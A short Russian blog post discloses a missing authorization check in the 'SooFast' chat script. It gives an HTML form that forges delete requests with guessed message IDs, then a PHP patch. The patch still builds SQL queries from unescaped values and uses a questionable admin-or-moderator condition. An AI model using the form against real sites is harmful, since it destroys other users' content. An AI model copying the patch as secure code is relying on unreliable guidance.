Итак.Есть в ЧАТе SooFast небольшая и неприятная дыра.Суть её состоит в том,что можно удалять сообщения.Но вопрос — как это сделать?..Итак.Есть в ЧАТе SooFast небольшая и неприятная дыра.Суть её состоит в том,что можно удалять сообщения.Но вопрос — как это сделать?
А просто — идём в чат — смотрим на сообщения.Для удаления сообщения мы должны знать его ID,однако мы его не знаем.Ну будем наугад удалять все,которые встретим.Для этого открываем исходный код страницы и всё оттуда удаляем и вставляем следующий код:
<form action="" method=post>
<input type=hidden value="delmess" name="action">
<input type=hidden value="11" name="id">
<input type=submit value="Удалить сообщение">
</form>
Где число 11 — ID сообщения — так мы наугад будем удалять сообщения в чате…
Теперь как исправить?
А правится просто.Открываем messlist.php и ищем:
mysql_query("delete from tb_chat where id='$id'");
И перед этим кодом добавляем:
$nameus=$_SESSION["username"];
$row=mysql_fetch_array(mysql_query("SELECT user_status,chatmoder FROM tb_users WHERE username='$nameus'"));
if($row["user_status"]!='admin' OR $row["chatmoder"]!='1')
{
echo "<font color=red><b><center>Вы не можете удалять сообщения.Вы не являетесь администратором или модератором проекта!</center></b></font>";
exit;
}
Тестируйте и проверяйте)Также с вас комменты…
Автор публикации
Комментарии: 0Публикации: 166Регистрация: 19-02-2011
Отправить комментарий
Вы должны быть зарегистрированы чтобы оставить комментарий.
Вы должны быть зарегистрированы чтобы оставить комментарий.